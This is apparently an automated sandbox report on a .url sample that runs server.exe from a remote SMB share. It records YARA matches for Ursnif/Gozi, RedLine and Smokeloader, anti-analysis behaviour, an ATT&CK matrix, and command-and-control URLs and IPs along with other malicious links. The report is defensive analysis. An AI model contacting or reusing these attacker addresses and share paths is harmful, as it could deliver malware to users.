Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B816DF	3_2_02B816DF
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B81D8A	3_2_02B81D8A
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B8832C	3_2_02B8832C
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE16DF	5_2_02BE16DF
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE1D8A	5_2_02BE1D8A
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE832C	5_2_02BE832C

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B8421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_02B8421F
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B88551 NtQueryVirtualMemory,	3_2_02B88551
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_02BE421F

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Section loaded: msvcr100.dll			Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Section loaded: msvcr100.dll			Jump to behavior

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: \Device\Mup\46.8.19.120\Agenzia\server.exe "\\46.8.19.120\Agenzia\server.exe"
Source: unknown	Process created: \Device\Mup\46.8.19.120\Agenzia\server.exe "\\46.8.19.120\Agenzia\server.exe"

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback

Jump to behavior

Source: classification engine

Classification label: mal88.troj.spyw.evad.winURL@2/3@2/2

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Code function: 3_2_02B830D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_02B830D5

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Unpacked PE file: 3.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B87F30 push ecx; ret	3_2_02B87F39
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B8831B push ecx; ret	3_2_02B8832B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02D54EDB push 8B8751D0h; retf	3_2_02D54EE0
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02D5A167 push edi; ret	3_2_02D5A168
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02D4FC2D pushad ; ret	3_2_02D4FC81
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE7F30 push ecx; ret	5_2_02BE7F39
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE831B push ecx; ret	5_2_02BE832B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02C59883 push 8B8751D0h; retf	5_2_02C59888
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02C545D5 pushad ; ret	5_2_02C54629
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02C5EB0F push edi; ret	5_2_02C5EB10

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR

Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632	Thread sleep count: 75 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632	Thread sleep count: 313 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632	Thread sleep count: 268 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632	Thread sleep count: 36 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 40 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 472 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 47 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 97 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 39 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 40 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 601 > 30	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852	Thread sleep count: 210 > 30	Jump to behavior

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Window / User API: threadDelayed 472			Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Window / User API: threadDelayed 601			Jump to behavior

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

File Volume queried: C:\Windows\System32 FullSizeInformation

Jump to behavior

Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX7
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&
Source: server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: server.exe, 00000005.00000002.2850719337.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B60D90 mov eax, dword ptr fs:[00000030h]	3_2_02B60D90
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B6092B mov eax, dword ptr fs:[00000030h]	3_2_02B6092B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02D523B0 push dword ptr fs:[00000030h]	3_2_02D523B0
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02C56D58 push dword ptr fs:[00000030h]	5_2_02C56D58

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Code function: 3_2_02B83BD3 cpuid

3_2_02B83BD3

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Code function: 3_2_02B8213E SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,

3_2_02B8213E

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Code function: 3_2_02B854D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

3_2_02B854D8

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe

Code function: 3_2_02B83BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_02B83BD3

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR

Opens network shares

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\Agenzia\server.exe	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\Agenzia\server.exe	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\Agenzia\server.exe	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\SystemResources\server.exe.mun	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\Agenzia\	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\Agenzia\	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\SystemResources\server.exe.mun	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\Agenzia\	Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	File opened: \\46.8.19.120\Agenzia\	Jump to behavior

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Network Share Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 System Time Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Account Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	15 System Information Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
marzo.txt.url	8%	ReversingLabs	Win32.Trojan.Casdet
marzo.txt.url	7%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.server.exe.2b80000.2.unpack	100%	Avira	HEUR/AGEN.1245293		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8	0%	Avira URL Cloud	safe
http://5.44.43.17/~	0%	Avira URL Cloud	safe
http://5.44.43.17/	0%	Avira URL Cloud	safe
http://5.44.43.17/b2c5-fe065076e0a1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
checklist.skype.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://5.44.43.17/	server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8	server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://5.44.43.17/~	server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://5.44.43.17/b2c5-fe065076e0a1	server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37	server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vr	server.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.44.43.17	unknown	Russian Federation		202423	MGNHOST-ASRU	true
192.229.221.95	unknown	United States		15133	EDGECASTUS	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	826967
Start date and time:	2023-03-15 12:30:25 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	1
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	marzo.txt.url
Detection:	MAL
Classification:	mal88.troj.spyw.evad.winURL@2/3@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 51.1% (good quality ratio 48.5%) Quality average: 79.8% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 56 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .url

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
192.229.221.95	Qui2.html	Get hash	malicious	HtmlDropper	Browse
	Qui.html	Get hash	malicious	HtmlDropper	Browse
	http://www.nhssecure.net/get_resource.asp?cid=74071a673307ca7459bcf75fbd024e09&id=205d7c9d0e7a7baad7d8608b91fcdbe5	Get hash	malicious	Unknown	Browse
	Veniam.html	Get hash	malicious	HtmlDropper	Browse
	Hic.html	Get hash	malicious	HtmlDropper	Browse
	PO-465514-180820.doc.zip	Get hash	malicious	Unknown	Browse
	ATT9873645.htm	Get hash	malicious	HTMLPhisher	Browse
	https://zsyqplxqhppbvzsqnfap7te6tabckg3sq3wfqkmbjymzhvyu-ipfs-dweb-link.translate.goog/alldomail.html?_x_tr_hp=bafybeibmec&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#test@test.com	Get hash	malicious	HTMLPhisher	Browse
	Dolorem.html	Get hash	malicious	HtmlDropper	Browse
	Roquette Financial Policy.html	Get hash	malicious	HTMLPhisher	Browse
	Contract202303.doc	Get hash	malicious	Unknown	Browse
	https://aftral.entura.com.pe	Get hash	malicious	HTMLPhisher	Browse
	Praesentium.html	Get hash	malicious	HtmlDropper	Browse
	https://www.newsbreakmail.com/redirect/aHR0cHM6Ly9waXczbW92c3ZtNjNkYzY1MDUxYmE2Ni54aW5odWF3ZWkucnUvTWNtUmhiV0YwYjBCaWNuZHVZMkZzWkM1amIyMD0=	Get hash	malicious	HTMLPhisher	Browse
	dominos.com.my Expired Password Notification.msg	Get hash	malicious	Unknown	Browse
	#U260eaudio000Rec.htm	Get hash	malicious	HTMLPhisher	Browse
	694c17d75e085701e022b3546c5f8d60ba741bfebff48e535abba4bc652aaa3e.zip	Get hash	malicious	Emotet	Browse
	tezt.rtf	Get hash	malicious	Unknown	Browse
	http://85.239.54.220/UU.php?i=32862	Get hash	malicious	Unknown	Browse
	theword-setup-en.exe	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

